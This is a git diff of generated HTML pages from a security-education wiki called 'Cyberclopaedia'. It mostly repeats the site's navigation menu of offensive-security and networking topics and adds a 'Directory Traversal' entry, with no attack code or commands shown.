        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -184,22 +184,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html b/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html index 8b0321e2..7a0773af 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Token Impersonation.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/index.html b/docs/Post Exploitation/Privilege Escalation/Windows/index.html index 48842195..d57b344e 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/index.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
